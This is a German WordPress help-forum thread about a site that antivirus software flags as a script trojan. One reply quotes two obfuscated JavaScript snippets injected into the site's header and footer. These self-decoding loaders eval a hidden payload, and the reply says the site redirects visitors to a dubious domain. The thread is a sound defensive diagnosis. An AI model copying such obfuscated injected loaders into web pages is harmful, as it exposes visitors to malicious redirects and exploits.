WP 2.7 / Kaspersky Meldung bezgl. Trojaner

  • Hallo Community!

    Folgende Ausgangssituation:
    Nutze seit ca. 3 Wochen die WP Version 2.7. Dieser Freshly Theme 2.0 wurde installiert sowie ca. 4 Plugins (Kontaktformular, Semmelstatz, etc.) installiert. Alles ist auf dem aktuellen Stand. Mein Rechner läuft unter Vista, alle Updates und hat Kaspersky 2009 Inet Security drauf ....

    Seit heute kommt nun folgende Meldung bei surfen auf meine Seite:

    ++++++++++++++++++++++++++++++++++++++++++++++
    Der Zugriff auf die angeforderte URL-Adresse ist nicht möglich

    Beim Zugriff auf die URL-Adresse:

    http://www.********.de/

    sind folgende Fehler aufgetreten:

    Das angeforderte Objekt ist mit folgenden Viren INFIZIERT: HEUR:Trojan.Script.Iframer
    ++++++++++++++++++++++++++++++++++++++++++++++

    Wenn ich die Seite unter Ubuntu aufrufe, passiert nichts. Andere Rechner habe ich noch nicht ausprobiert. Nach ähnlichen Problemen zu googlen hat nur Hinweise à la "Tronjaner im Footer.php" etc gebracht. Dennoch schließe ich diese Probleme aus ...

    Meine Frage: Täusche ich mich und ich hab was im Code? (Zu erwähnen wäre, dass ich alle Plugins deinstalliert habe und auch den default Theme aktiviert habe -> gleiches Problem) oder liegt das an Kaspersky?

    Vielen Dank,
    Grüße aus dem verregneten Stuttgart,
    Alex

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Meine Frage: Täusche ich mich und ich hab was im Code? (Zu erwähnen wäre, dass ich alle Plugins deinstalliert habe und auch den default Theme aktiviert habe -> gleiches Problem) oder liegt das an Kaspersky?


    Wie soll man das sagen können, wenn du den Link zum Blog nicht nennst?

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • Kaspersky meint, dass es an dem Code im Seitenquelltext liegen könnte und der irgendwie verschleiert wird. Die Heuristik der Kaspersky Software reagiert darauf wohl etwas anfällig. Kann mir das ggf. jemand bestätigen?

    Danke!

    Gruss

  • Mein Antivir springt auch an, irgendwas mit Flash Exploit schreit er. Ignoriere ich die Warnung, dann leitet mich dein Blog auf eine andere Seite (h**p://mysexydreams*net/img/stat/404.php) weiter. Könnte es etwa was mit dem Code im Footer zu tun haben?

    HTML
    <script language=JavaScript>	function zbnb25(z)	{	var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,61,14,29,24,55,3,44,20,43,0,0,0,0,0,0,37,32,18,1,12,11,21,19,13,7,62,42,25,56,28,47,9,34,51,23,59,36,0,45,46,39,38,0,0,0,0,8,0,41,48,10,6,40,17,49,33,27,53,54,15,4,5,2,16,22,26,50,58,30,31,60,52,57,35);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(167^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}zbnb25('pTNs6zDxPB1xdlWx89PAzzNso6_Y6zDgB97bPl3QpSWRGEwzVXaRCSWgcEwhPi7so9yYGJy@IB3jm9Lhll1xS5PQ_oPjSE7b6YeRPIDs_2HQ4o_zKiwxlY4j_E3s60etdl1RPqWgPlDsc0ezHJyYp2azDoMYGJy@Vs_Anu_x2lwxl9a@SqyhlE7RV0wxrJPUIB1xuO7brqMb2G1jEi753ZDsPENhLXPQ2INjd97bLoez') </script><!-- 62.26.219.193 -->


    Hab mir jetzt nicht die Mühe gemacht, das zu entschlüsseln. Sollte aber bspw. mit Firebug recht schnell gehen. Schau mal anch ob das beabsichtigt ist bzw. wo das her kommt. Möglicherweise hängt sich da ein bösartiges Script in den wp_footer-Hook ein.

    Nachtrag: im Header ist was ähnliches (gleiches?) zu finden, direkt nach <body>:

    HTML
    <script language=JavaScript>function xfibnb25(z){var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,54,24,15,49,58,50,35,43,19,0,0,0,0,0,0,41,53,46,12,60,47,57,27,16,18,39,44,31,10,11,42,1,22,45,5,6,61,17,55,59,28,13,0,0,0,0,14,0,8,9,21,30,3,2,51,32,48,37,62,4,29,56,23,7,38,20,25,40,52,26,36,33,34,0);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(173^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}xfibnb25('v9DibNK1e5m1CJZ1de@y@NDia8tjbNKg2eC6eJUhv0Z4s7YxMTb4N0Zgz7Y7egCiaebJ_osJbWtWLXCw3QY1sWUjfMtqdWZ6aJDhl3D6fN21fM@yTf_gsoDhLNC1eJYxhgY1S3nWC3Y6feYxldnqc5bJlvtyY5YjmqKyTOn7ZOZ4bJm4HIbjZQC6l8Y4seFqr1tWs9miaeF7b9KWmpCgrLFif3C63_swfID6LgCia3@ylf')	</script><!-- 62.26.219.193 -->

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!